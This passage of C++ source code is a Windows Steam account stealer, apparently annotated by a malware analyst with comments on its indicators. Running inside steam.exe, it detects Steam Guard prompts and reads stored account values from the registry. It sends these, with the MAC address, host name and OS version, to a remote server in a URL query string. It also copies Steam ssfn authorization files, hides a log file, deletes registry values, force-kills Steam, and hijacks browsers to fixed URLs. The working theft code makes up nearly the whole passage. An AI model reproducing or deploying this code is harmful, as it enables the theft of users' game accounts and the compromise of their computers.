					if( GetProcess("QQ.exe") )
					{
						ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);
					}
					else
					{
						ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);
					}
				}
				szIERegedit = true;
			}
		}
		else
		{
			goto myOtherFunction;
		}

	myOtherFunction:
		if( GetProcess("steam.exe") )
		{
			// Classify the foreground window by class-name substring.
			HWND Hwnd_Browser = ::GetForegroundWindow();

			TCHAR szClassName[MAX_PATH];
			ZeroMemory(szClassName, MAX_PATH * sizeof(TCHAR));
			::GetClassName(Hwnd_Browser, szClassName, MAX_PATH);

			CString szMyClass = "";
			szMyClass.Format(TEXT("%s"), szClassName);

			int sz360Class = szMyClass.Find("360se6_Frame", 0);
			int szChromeClass = szMyClass.Find("WidgetWin_1", 0);
			int szChromeClass_WidgetWin = szMyClass.Find("Chrome_WidgetWin_1", 0);
			int szQQBrowserClass_WidgetWin = szMyClass.Find("QQBrowser_WidgetWin_0", 0);

			if( sz360Class >= 0 || szChromeClass_WidgetWin >= 0 || szChromeClass >= 0 || szQQBrowserClass_WidgetWin >= 0 )
			{
				DWORD processid;
				::GetWindowThreadProcessId(Hwnd_Browser, &processid);

				// PROCESS_ALL_ACCESS is requested on the window's owning process.
				HANDLE hprocess=::OpenProcess(PROCESS_ALL_ACCESS, FALSE, processid);
				if(hprocess != NULL)
				{
					CString myIEver = GetIEVerSion();
					int szIE_8 = myIEver.Find("8.0", 0);

					if( szIE_8 >= 0)
					{
						DWORD cbNeededx = 0;
						HMODULE hModx = NULL;

						// Only the first module is requested; its file name is used
						// below as the browser's executable path.
						if( ::EnumProcessModules( hprocess, &hModx, sizeof( hModx ), &cbNeededx ) !=0 )
						{
							TCHAR myBrowserPath[MAX_PATH + 1] = {0};
							if( ::GetModuleFileNameEx( hprocess, hModx, myBrowserPath, MAX_PATH ) !=0 )
							{
								CString szBrowserPath;
								szBrowserPath.Format(TEXT(" /c \"%s\" https://w.mail.qq.com"), myBrowserPath);

								//AfxMessageBox("szBrowserPath:\n"+szBrowserPath);

								// Kill the browser, then restart the same executable on
								// the fixed URL through a hidden cmd.exe.
								::TerminateProcess(hprocess, 0);

								ShellExecute(NULL, "open", "cmd.exe", szBrowserPath, "", SW_HIDE);
							}
						}
					}
					else
					{
						::TerminateProcess(hprocess, 0);

						if( GetProcess("QQ.exe") )
						{
							ShellExecute(NULL, "open", "iexplore.exe", "https://w.mail.qq.com/", "", SW_MAXIMIZE);
						}
						else
						{
							ShellExecute(NULL, "open", "iexplore.exe", "http://www.benpig.com/index.htm", "", SW_MAXIMIZE);
						}
					}
					szIERegedit = true;
				}
				::CloseHandle(hprocess);
			}
		}
		Sleep(100);

	} while( !szIERegedit );

	return 0;
}

 
// 监控 Tslgame 主界面 线程模块

// Thread routine that waits until TslGame.exe is running with an
// "UnrealWindow" window in the foreground, then sends a single notification
// request to the remote server.
//
// Analyst notes:
//  - The request is "<strMailServerName>cj.php?ID=<szMailID>&CJ=0", sent via
//    SendURLPost; strMailServerName and szMailID are globals set elsewhere.
//    The "cj.php?ID=...&CJ=0" pattern is the network indicator for this step.
//  - The foreground window is polled every 100 ms. The loop ends after a
//    successful send, or as soon as steam.exe is no longer running.
//  - The global szTslgameEXE is reset to FALSE on entry and used as the exit flag.
//
// pParam is unused. Always returns 0.
static DWORD WINAPI HOOKGameMain(LPVOID pParam)
{
	//AfxMessageBox("Tslgame main window monitor thread started!");

	szTslgameEXE = FALSE;

	do{
		HWND Hwnd_Tslgame = ::GetForegroundWindow();

		TCHAR szSTClassName[MAX_PATH]={0};

		ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));

		::GetClassName(Hwnd_Tslgame, szSTClassName, MAX_PATH);

		CString szMySTClass = "";
		szMySTClass.Format(TEXT("%s"), szSTClassName);

		// Substring match on the foreground window's class name.
		int isSTClass = szMySTClass.Find("UnrealWindow", 0);

		if( GetProcess("TslGame.exe") && isSTClass >= 0 )
		{
			//AfxMessageBox("Window style:" + szStyle1 + "\nExtended style:" + szStyle2);

			//AfxMessageBox("Tslgame main window reached!");

			// Build the statistics data
			CString strPostData = "";
			strPostData.Format(TEXT("%scj.php?ID=%s&CJ=0"), 
			strMailServerName, 
			szMailID);

			//AfxMessageBox(strPostData);

			// Send only when Windows reports network connectivity.
			DWORD dw0;
			BOOL isConnect = ::IsNetworkAlive( &dw0 );
			if( isConnect )
			{
				BOOL Result = SendURLPost(strPostData);
				if( Result )
				{
					szTslgameEXE = true;
				}
			}
		}
		else
		{
			// Stop watching once steam.exe is gone.
			if( !GetProcess("steam.exe") )
			{
				szTslgameEXE = true;
			}
		}
		Sleep(100);

	} while( !szTslgameEXE );

	return 0;
}
 
// 监控 Steam 主界面 线程模块

// Thread routine that waits for the Steam main window to come to the
// foreground and then hands the Steam ssfn* files to SearchFilesByWildcard_2.
//
// Analyst notes:
//  - Work is only done when the current process id equals GetEXE() (defined
//    elsewhere; presumably the pid of steam.exe, which would mean this code is
//    expected to run inside the Steam process - confirm against that helper).
//  - The "main window" test is a class-name substring ("PopupWindow") combined
//    with a window-style value of 960F0000 or 96CF0000.
//  - The install path is read from HKCU\Software\Valve\Steam\SteamPath and the
//    pattern "<SteamPath>/ssfn*" is built from it. In this file the visible part
//    of SearchFilesByWildcard_2 copies each match to "c:/<name>.key", writes a
//    .VBS file, runs it through a hidden cmd.exe, and deletes the original
//    file. Missing ssfn* files in the Steam directory together with new
//    "c:\*.key" files are the host-side indicators.
//  - The key is opened with KEY_QUERY_VALUE|KEY_WRITE although only a read is
//    performed here.
//  - Afterwards a HOOKGameMain thread is started and the globals szBrowser,
//    szIERegedit (true) and szEMailName (false) are set; the two true flags are
//    the exit conditions of the HOOKBrowser and HOOKIERegedit loops in this file.
//
// pParam is unused. Always returns 0.
static DWORD WINAPI HOOKLoginMain(LPVOID pParam)
{
	//AfxMessageBox("steam.exe main window monitor thread started!");

	BOOL szLoginEXE = FALSE;

	do{
		if( ::GetCurrentProcessId() == GetEXE() )
		{
			HWND Hwnd_Steam = ::GetForegroundWindow();

			TCHAR szSTClassName[MAX_PATH]={0};
			ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));
			::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);

			CString szMySTClass = "";
			szMySTClass.Format(TEXT("%s"), szSTClassName);

			// "PopupWindow" is a substring of "vguiPopupWindow", so either match passes.
			int isSTClass1 = szMySTClass.Find("PopupWindow", 0);
			int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);

			// The style is read twice (GetWindowLong and GetWindowLongPtr) and
			// both results are compared below.
			long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);
			long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);

			long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);
			long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);

			CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";

			szStyle1.Format(TEXT("%X"), lstyle1);
			szStyle2.Format(TEXT("%X"), lstyle2);

			szStyle3.Format(TEXT("%X"), lstyle3);
			szStyle4.Format(TEXT("%X"), lstyle4);

			if( 
				(isSTClass2 >= 0 || isSTClass1 >= 0) 
				&& 
				(szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") 
			)
			{
				//AfxMessageBox("Window style:" + szStyle1 + "\nExtended style:" + szStyle2);

				//AfxMessageBox("Start checking whether the Steam main window has been reached!");

				///
				// Process the machine authorization files

				CString mySTInstPath = "", mySTSSFNFilePath = "";

				// Locate the Steam install directory from the per-user registry key.
				HKEY dw_hKey;
				LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,
				TEXT("Software\\Valve\\Steam"),
				0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );
				if( x_Ret1 == ERROR_SUCCESS )
				{
					char dw_data[256] = {0};
					DWORD dw_Type = REG_SZ;
					DWORD dw_Length = 256;

					// The query result (x_Ret2) is not checked before dw_data is used.
					LONG x_Ret2 = RegQueryValueEx( dw_hKey, 
					TEXT("SteamPath"), 
					NULL, 
					&dw_Type, (LPBYTE)dw_data, &dw_Length );

					mySTInstPath.Format(TEXT("%s"), dw_data);
					mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);
				}
				RegCloseKey(dw_hKey);

				char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);
				mySTInstPath.ReleaseBuffer();

				char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);
				mySTSSFNFilePath.ReleaseBuffer();

				//AfxMessageBox(mySTInstPath);
				//AfxMessageBox(mySTSSFNFilePath);

				// Hand the directory and the ssfn* pattern to the file handler.
				SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);

				// Raise the exit flag of any HOOKGameMain loop already running; the
				// thread started below resets the flag to FALSE on entry.
				szTslgameEXE = true;

				Sleep(3000);

				DWORD dwThreadId4;
				CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); 

				szBrowser = true;
				szLoginEXE = true;
				szEMailName = false;
				szIERegedit = true;
			}
		}
		else
		{
			// Steam is gone: raise the same flags and leave the loop.
			if( !GetProcess("steam.exe") )
			{
				szBrowser = true;

				szLoginEXE = true;

				szEMailName = false;

				szIERegedit = true;
			}
		}
		Sleep(100);

	} while( !szLoginEXE );

	return 0;
}

 
// 监控 登陆器界面 线程模块

// Thread routine that watches the Steam login flow and, once a Steam Guard
// prompt or the Steam main window is in the foreground, reads stored account
// values from the registry and transmits them to a remote server.
//
// Analyst notes (all taken from the code below):
//  - Work is only done when the current process id equals GetEXE() (defined
//    elsewhere; presumably the pid of steam.exe - confirm against that helper).
//  - The prompt is recognised by window-title substrings ("Steam Guard", "令牌"
//    and spacing variants) and classified by window style into szLocalLP:
//    "0" for 960A0000/96CA0000, "1" for 960F0000/96CF0000, "2" otherwise (per
//    the debug strings: email token, mobile token, unknown). When no prompt
//    title matches but the Steam main window is detected, szLocalLP is "3".
//  - Registry reads: HKCU\Software\Valve\Steam\AutoLoginUser, then the values
//    AccOne, DataOne, AccSecond and DataSecond under
//    HKCU\Software\Valve\Steam\<AutoLoginUser>. This routine only reads those
//    four values; what writes them is not visible in this part of the file.
//  - Transmission: one URL built as
//    "<strServerName>?M=..&OS=..&CP=..&VER=..&ID=..&AccOne=..&DataOne=..
//    &AccSecond=..&DataSecond=..&MD5=..&LP=..&JC=" and opened via SendURLPost,
//    so the values travel in the query string together with the MAC address,
//    OS string and host name. The parameter-name sequence is a usable network
//    signature.
//  - The "MD5" parameter is "_CHWM_" plus ten letters from rand() seeded with
//    time(NULL), passed through gen() and BASE64Encode() (both defined
//    elsewhere). Nothing in this block uses it to transform the other fields.
//  - Host artifacts: C:\NTUSERS.LOG (user name written or appended, then marked
//    hidden), deletion of C:\MailData.txt, removal of the "Gaming" and
//    "AutoLoginUser" values from HKCU\Software\Valve\Steam, and on failure
//    paths a hidden "cmd.exe /q /c taskkill /f /im steam.exe".
//  - Follow-up threads: HOOKLoginMain for types "0" and "2"; for type "3" the
//    ssfn* files are handed to SearchFilesByWildcard_2 and HOOKGameMain is started.
//  - The loop ends after the first matching window is handled, whether or not
//    the data was sent, or when steam.exe is no longer running.
//
// pParam is unused. Always returns 0.
static DWORD WINAPI HOOKLoginEXE(LPVOID pParam)
{
	//AfxMessageBox("steam.exe login window monitor thread started!");

	BOOL szLoginEXE = FALSE;

	do{
		if(::GetCurrentProcessId() == GetEXE())
		{
			HWND H_wnd = ::GetForegroundWindow();

			char sTitles[256];
			memset(sTitles, 0, 256);

			// Read the foreground window title.
			::SendMessage(H_wnd, WM_GETTEXT, 255, (LPARAM)sTitles);

			// Title substrings that identify a Steam Guard ("令牌" = token) prompt.
			char *LP1;
			LP1 = strstr(sTitles, "Steam 令牌");

			char *LP2;
			LP2 = strstr(sTitles, "Steam  令牌");

			char *LP3;
			LP3 = strstr(sTitles, "Steam Guard");

			char *LP4;
			LP4 = strstr(sTitles, "Steam  Guard");

			char *LP5;
			LP5 = strstr(sTitles, "S t e a m 令牌");

			char *LP6;
			LP6 = strstr(sTitles, "S t e a m  令牌");

			char *LP7;
			LP7 = strstr(sTitles, "令牌");

			if( LP1 || LP2 || LP3 || LP4 || LP5 || LP6 || LP7 )
			{
				//AfxMessageBox("Start determining the token type!");

				long lstyle1 = GetWindowLong(H_wnd, GWL_STYLE);
				long lstyle2 = GetWindowLong(H_wnd, GWL_EXSTYLE);

				long lstyle3 = GetWindowLongPtr(H_wnd, GWL_STYLE);
				long lstyle4 = GetWindowLongPtr(H_wnd, GWL_EXSTYLE);

				CString szLP1 = "", szLP2 = "", szLP3 = "", szLP4 = "";

				szLP1.Format(TEXT("%X"), lstyle1);
				szLP2.Format(TEXT("%X"), lstyle2);

				szLP3.Format(TEXT("%X"), lstyle3);
				szLP4.Format(TEXT("%X"), lstyle4);

				//AfxMessageBox("Window style:"+szLP1+"\nExtended style:"+szLP2);

				// Classify the prompt by its window style value.
				if( szLP1 == "960A0000" || szLP1 == "96CA0000" || szLP3 == "960A0000" || szLP3 == "96CA0000" )
				{
					//AfxMessageBox("Email token");
					szLocalLP = "0";
				}
				else if( szLP1 == "960F0000" || szLP1 == "96CF0000" || szLP3 == "960F0000" || szLP3 == "96CF0000" )
				{
					//AfxMessageBox("Mobile token");
					szLocalLP = "1";
				}
				else
				{
					//AfxMessageBox("Unknown token");
					szLocalLP = "2";
				}

				HKEY hKey, xKey;
				LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,
				TEXT("Software\\Valve\\Steam"),
				0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );
				if( lRet == ERROR_SUCCESS )
				{
					char user[256] = {0};
					DWORD dwType = REG_SZ;
					DWORD dwLength = 256;

					// Account name Steam stored for automatic login.
					LONG lRet2 = RegQueryValueEx( hKey, 
					TEXT("AutoLoginUser"), 
					NULL, 
					&dwType, (LPBYTE)user, &dwLength );
					if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 )
					{
						CString LocalUser = "";
						CString ReadRegUser = "";

						LocalUser.Format(TEXT("%s"), user);
						ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);

						// Per-user subkey named after the account.
						LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,
						ReadRegUser,
						0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );
						if( lRet2 == ERROR_SUCCESS )
						{
							char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};
							DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;
							DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;

							LONG lRet3 = RegQueryValueEx( xKey, 
							TEXT("AccOne"), 
							NULL, 
							&dwType1, (LPBYTE)data1, &dwLength1 );

							LONG lRet4 = RegQueryValueEx( xKey, 
							TEXT("DataOne"), 
							NULL, 
							&dwType2, (LPBYTE)data2, &dwLength2 );

							LONG lRet5 = RegQueryValueEx( xKey, 
							TEXT("AccSecond"), 
							NULL, 
							&dwType3, (LPBYTE)data3, &dwLength3 );

							LONG lRet6 = RegQueryValueEx( xKey, 
							TEXT("DataSecond"), 
							NULL, 
							&dwType4, (LPBYTE)data4, &dwLength4 );

							// Proceed only if all four values were read and the last two
							// meet the minimum lengths.
							if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) )
							{
								CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";

								szRegAccOne.Format(TEXT("%s"), data1);
								szRegDataOne.Format(TEXT("%s"), data2);
								szRegAccSecon.Format(TEXT("%s"), data3);
								szRegDataSecon.Format(TEXT("%s"), data4);

								/
								// Randomly generate a 16-character KEY

								time_t seed = time(NULL); 
								srand((unsigned)seed);

								int randNum = (rand()*2);

								CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";

								szMD5Key += "_CHWM_";

								int szMD5Key_Len = szMD5Key.GetLength();

								// Pad the fixed prefix to 16 characters with letters whose
								// case alternates by position.
								for(int j=szMD5Key_Len; j<16 ;j++)
								{
									int randNum = rand()%26;
									if(j%2)
									{
										szMD5.Format("%C", randNum+97);
									}
									else
									{
										szMD5.Format("%C", randNum+65);
									}
											szMD5Key += szMD5;
											Sleep(50);
								}

								szMD5Key = gen(szMD5Key);
								Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());
								/

								memset(osx, 0, MAX_PATH);
								memset(jsj, 0, MAX_PATH);

								// Get the computer name
								WSADATA _wsaData = {0};
								int _Result = 0;
								_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
								if(_Result == SOCKET_ERROR)
								{
									strcat(jsj, "unkonw");
								}
								_Result = gethostname(jsj, sizeof(jsj));
								if(_Result == SOCKET_ERROR)
								{
									strcat(jsj, "unkonw");
								}
								WSACleanup();

								// Get the MAC address
								CString szMac = "";
								szMac = GetMacAddress();

								// Get the OS version
								os();

								// Build the statistics data
								// Every collected value is placed in the URL query string.
								CString strPostData = "";
								strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), 
								strServerName, 
								szMac, 
								osx, 
								jsj, 
								szVersion, 
								strUserID, 
								szRegAccOne, 
								szRegDataOne, 
								szRegAccSecon, 
								szRegDataSecon, 
								Base64_szMD5Key,
								szLocalLP);

								// Only spaces are percent-encoded.
								strPostData.Replace(" ", "%20");
								//AfxMessageBox(strPostData);

								DWORD dw0;
								BOOL isConnect = ::IsNetworkAlive( &dw0 );
								if( isConnect )
								{
									BOOL Result = SendURLPost(strPostData);
									if( Result )
									{
										//AfxMessageBox("Data sent successfully!");

										// Record the account name in C:\NTUSERS.LOG, created
										// if absent and appended to otherwise.
										FILE *fp;
										CFileFind finder1x;
										BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");
										if(!noEmpty1x)
										{
											fp=fopen("C:\\NTUSERS.LOG", "w");
											if(fp)
											{
												fprintf(fp, "%s", LocalUser.GetBuffer(0));
											}
											fclose(fp);
										}
										else
										{
											fp=fopen("C:\\NTUSERS.LOG", "a");
											if(fp)
											{
												fprintf(fp, "%s", LocalUser.GetBuffer(0));
											}
											fclose(fp);
										}

										// Hide the data file
										SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);

										// Remove the auto-login values from the Steam key.
										RegDeleteValue(hKey, TEXT("Gaming"));
										RegDeleteValue(hKey, TEXT("AutoLoginUser"));

										Login = false;
										szLoginEXE = true;

										/*		Email token	*/
										if(szLocalLP == "0")
										{
											DeleteFile("C:\\MailData.txt");

											// Create the IE hijack thread
											//szBrowser = false;
											//DWORD dwThreadId;
											//CreateThread(NULL, 0, HOOKBrowser, NULL, 0, &dwThreadId);

											// Create the thread that monitors the Steam main window
											myEmailSTR = "";
											DWORD dwThreadId2;
											CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId2); 

											/*
											Create the thread that locks the registry default
											browser and hijacks non-IE-kernel browsers
											*/
											//DWORD dwThreadId3;
											//CreateThread(NULL, 0, HOOKIERegedit, NULL, 0, &dwThreadId3); 
										}
										else if(szLocalLP == "2")
										{
											/*		Unknown token	*/

											// Create the thread that monitors the Steam main window
											myEmailSTR = "";
											DWORD dwThreadId;
											CreateThread(NULL, 0, HOOKLoginMain, NULL, 0, &dwThreadId); 
										}
									}
									else
									{
										//AfxMessageBox("Failed to send data!");

										// Send failed: remove the log, clear the auto-login
										// values and force-terminate steam.exe.
										DeleteFile("C:\\NTUSERS.LOG");
										RegDeleteValue(hKey, TEXT("Gaming"));
										RegDeleteValue(hKey, TEXT("AutoLoginUser"));

										Login = false;
										szLoginEXE = true;

										RegCloseKey(xKey);
										RegCloseKey(hKey);

										ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
									}
								}
								else
								{
									// No network: same cleanup and forced termination.
									DeleteFile("C:\\NTUSERS.LOG");
									RegDeleteValue(hKey, TEXT("Gaming"));
									RegDeleteValue(hKey, TEXT("AutoLoginUser"));

									Login = false;
									szLoginEXE = true;

									RegCloseKey(xKey);
									RegCloseKey(hKey);

									ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
								}
							}
							else
							{
									// Stored values missing or too short: clear the
									// auto-login values and force-terminate steam.exe.
									RegDeleteValue(hKey, TEXT("Gaming"));
									RegDeleteValue(hKey, TEXT("AutoLoginUser"));

									Login = false;
									szLoginEXE = true;

									ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
							}
						}
					}
				}
				// Reached for every matched prompt, so the loop ends here regardless
				// of which path ran above.
				Login = false;
				szLoginEXE = true;

				RegCloseKey(xKey);
				RegCloseKey(hKey);
			}
			else
			{
				// No token prompt in the title: check whether the foreground window
				// is the Steam main window instead.
				HWND Hwnd_Steam = ::GetForegroundWindow();

				TCHAR szSTClassName[MAX_PATH]={0};
				ZeroMemory(szSTClassName, MAX_PATH * sizeof(TCHAR));
				::GetClassName(Hwnd_Steam, szSTClassName, MAX_PATH);

				CString szMySTClass = "";
				szMySTClass.Format(TEXT("%s"), szSTClassName);

				int isSTClass1 = szMySTClass.Find("PopupWindow", 0);
				int isSTClass2 = szMySTClass.Find("vguiPopupWindow", 0);

				long lstyle1 = GetWindowLong(Hwnd_Steam, GWL_STYLE);
				long lstyle2 = GetWindowLong(Hwnd_Steam, GWL_EXSTYLE);

				long lstyle3 = GetWindowLongPtr(Hwnd_Steam, GWL_STYLE);
				long lstyle4 = GetWindowLongPtr(Hwnd_Steam, GWL_EXSTYLE);

				CString szStyle1 = "", szStyle2 = "", szStyle3 = "", szStyle4 = "";

				szStyle1.Format(TEXT("%X"), lstyle1);
				szStyle2.Format(TEXT("%X"), lstyle2);

				szStyle3.Format(TEXT("%X"), lstyle3);
				szStyle4.Format(TEXT("%X"), lstyle4);

				if( 
					(isSTClass2 >= 0 || isSTClass1 >= 0) 
					&& 
					(szStyle1 == "960F0000" || szStyle1 == "96CF0000" || szStyle3 == "960F0000" || szStyle3 == "96CF0000") 
				)
				{
					/* This is rented-account data */
					szLocalLP = "3";

					// From here the registry read, key generation and URL construction
					// repeat the token branch above.
					HKEY hKey, xKey;
					LONG lRet = RegOpenKeyEx( HKEY_CURRENT_USER,
					TEXT("Software\\Valve\\Steam"),
					0, KEY_QUERY_VALUE|KEY_WRITE, &hKey );
					if( lRet == ERROR_SUCCESS )
					{
						char user[256] = {0};
						DWORD dwType = REG_SZ;
						DWORD dwLength = 256;

						LONG lRet2 = RegQueryValueEx( hKey, 
						TEXT("AutoLoginUser"), 
						NULL, 
						&dwType, (LPBYTE)user, &dwLength );
						if( lRet2 == ERROR_SUCCESS && strlen(user) > 4 )
						{
							CString LocalUser = "";
							CString ReadRegUser = "";

							LocalUser.Format(TEXT("%s"), user);
							ReadRegUser.Format(TEXT("Software\\Valve\\Steam\\%s"), user);

							LONG lRet2 = RegOpenKeyEx( HKEY_CURRENT_USER,
							ReadRegUser,
							0, KEY_QUERY_VALUE|KEY_WRITE, &xKey );
							if( lRet2 == ERROR_SUCCESS )
							{
								char data1[256] = {0}, data2[256] = {0}, data3[256] = {0}, data4[256] = {0};
								DWORD dwType1 = REG_SZ, dwType2 = REG_SZ, dwType3 = REG_SZ, dwType4 = REG_SZ;
								DWORD dwLength1 = 256, dwLength2 = 256, dwLength3 = 256, dwLength4 = 256;

								LONG lRet3 = RegQueryValueEx( xKey, 
								TEXT("AccOne"), 
								NULL, 
								&dwType1, (LPBYTE)data1, &dwLength1 );

								LONG lRet4 = RegQueryValueEx( xKey, 
								TEXT("DataOne"), 
								NULL, 
								&dwType2, (LPBYTE)data2, &dwLength2 );

								LONG lRet5 = RegQueryValueEx( xKey, 
								TEXT("AccSecond"), 
								NULL, 
								&dwType3, (LPBYTE)data3, &dwLength3 );

								LONG lRet6 = RegQueryValueEx( xKey, 
								TEXT("DataSecond"), 
								NULL, 
								&dwType4, (LPBYTE)data4, &dwLength4 );

								if( (lRet3 == ERROR_SUCCESS && lRet4 == ERROR_SUCCESS && lRet5 == ERROR_SUCCESS && lRet6 == ERROR_SUCCESS) && (strlen(data3) >= 10 && strlen(data4) >= 20) )
								{
									CString szRegAccOne = "", szRegDataOne = "", szRegAccSecon = "", szRegDataSecon = "";

									szRegAccOne.Format(TEXT("%s"), data1);
									szRegDataOne.Format(TEXT("%s"), data2);
									szRegAccSecon.Format(TEXT("%s"), data3);
									szRegDataSecon.Format(TEXT("%s"), data4);

									/
									// Randomly generate a 16-character KEY

									time_t seed = time(NULL); 
									srand((unsigned)seed);

									int randNum = (rand()*2);

									CString szMD5 = "", szMD5Key = "", Base64_szMD5Key = "";

									szMD5Key += "_CHWM_";

									int szMD5Key_Len = szMD5Key.GetLength();

									for(int j=szMD5Key_Len; j<16 ;j++)
									{
										int randNum = rand()%26;
										if(j%2)
										{
											szMD5.Format("%C", randNum+97);
										}
										else
										{
											szMD5.Format("%C", randNum+65);
										}
												szMD5Key += szMD5;
												Sleep(50);
									}

									szMD5Key = gen(szMD5Key);
									Base64_szMD5Key = BASE64Encode(szMD5Key, szMD5Key.GetLength());
									/

									memset(osx, 0, MAX_PATH);
									memset(jsj, 0, MAX_PATH);

									// Get the computer name
									WSADATA _wsaData = {0};
									int _Result = 0;
									_Result = WSAStartup(MAKEWORD(2, 2), &_wsaData);
									if(_Result == SOCKET_ERROR)
									{
										strcat(jsj, "unkonw");
									}
									_Result = gethostname(jsj, sizeof(jsj));
									if(_Result == SOCKET_ERROR)
									{
										strcat(jsj, "unkonw");
									}
									WSACleanup();

									// Get the MAC address
									CString szMac = "";
									szMac = GetMacAddress();

									// Get the OS version
									os();

									// Build the statistics data
									CString strPostData = "";
									strPostData.Format(TEXT("%s?M=%s&OS=%s&CP=%s&VER=%s&ID=%s&AccOne=%s&DataOne=%s&AccSecond=%s&DataSecond=%s&MD5=%s&LP=%s&JC="), 
									strServerName, 
									szMac, 
									osx, 
									jsj, 
									szVersion, 
									strUserID, 
									szRegAccOne, 
									szRegDataOne, 
									szRegAccSecon, 
									szRegDataSecon, 
									Base64_szMD5Key,
									szLocalLP);

									strPostData.Replace(" ", "%20");
									//AfxMessageBox(strPostData);

									DWORD dw0;
									BOOL isConnect = ::IsNetworkAlive( &dw0 );
									if( isConnect )
									{
										BOOL Result = SendURLPost(strPostData);
										if( Result )
										{
											//AfxMessageBox("Data sent successfully!");

											FILE *fp;
											CFileFind finder1x;
											BOOL noEmpty1x=finder1x.FindFile("C:\\NTUSERS.LOG");
											if(!noEmpty1x)
											{
												fp=fopen("C:\\NTUSERS.LOG", "w");
												if(fp)
												{
													fprintf(fp, "%s", LocalUser.GetBuffer(0));
												}
												fclose(fp);
											}
											else
											{
												fp=fopen("C:\\NTUSERS.LOG", "a");
												if(fp)
												{
													fprintf(fp, "%s", LocalUser.GetBuffer(0));
												}
												fclose(fp);
											}

											// Hide the data file
											SetFileAttributes("C:\\NTUSERS.LOG", FILE_ATTRIBUTE_HIDDEN);

											RegDeleteValue(hKey, TEXT("Gaming"));
											RegDeleteValue(hKey, TEXT("AutoLoginUser"));

											Login = false;
											szLoginEXE = true;

											///
											// Process the machine authorization files
											// Same SteamPath lookup and ssfn* hand-off as in
											// HOOKLoginMain.

											CString mySTInstPath = "", mySTSSFNFilePath = "";

											HKEY dw_hKey;
											LONG x_Ret1 = RegOpenKeyEx( HKEY_CURRENT_USER,
											TEXT("Software\\Valve\\Steam"),
											0, KEY_QUERY_VALUE|KEY_WRITE, &dw_hKey );
											if( x_Ret1 == ERROR_SUCCESS )
											{
												char dw_data[256] = {0};
												DWORD dw_Type = REG_SZ;
												DWORD dw_Length = 256;

												LONG x_Ret2 = RegQueryValueEx( dw_hKey, 
												TEXT("SteamPath"), 
												NULL, 
												&dw_Type, (LPBYTE)dw_data, &dw_Length );

												mySTInstPath.Format(TEXT("%s"), dw_data);
												mySTSSFNFilePath.Format(TEXT("%s/ssfn*"), dw_data);
											}
											RegCloseKey(dw_hKey);

											char *mySSFNPathx = mySTInstPath.GetBuffer(mySTInstPath.GetLength()+1);
											mySTInstPath.ReleaseBuffer();

											char *mySSFNFilex = mySTSSFNFilePath.GetBuffer(mySTSSFNFilePath.GetLength()+1);
											mySTSSFNFilePath.ReleaseBuffer();

											//AfxMessageBox(mySTInstPath);
											//AfxMessageBox(mySTSSFNFilePath);

											SearchFilesByWildcard_2(mySSFNPathx, mySSFNFilex);

											szTslgameEXE = true;

											Sleep(3000);

											DWORD dwThreadId4;
											CreateThread(NULL, 0, HOOKGameMain, NULL, 0, &dwThreadId4); 

											///
										}
										else
										{
											//AfxMessageBox("Failed to send data!");

											DeleteFile("C:\\NTUSERS.LOG");
											RegDeleteValue(hKey, TEXT("Gaming"));
											RegDeleteValue(hKey, TEXT("AutoLoginUser"));

											Login = false;
											szLoginEXE = true;

											RegCloseKey(xKey);
											RegCloseKey(hKey);

											ShellExecute(NULL, "open", "cmd.exe", " /q /c taskkill /f /im steam.exe", NULL, SW_HIDE);
										}
									}
									else
									{
										DeleteFile("C:\\NTUSERS.LOG");
										RegDeleteValue(hKey, TEXT("Gaming"));
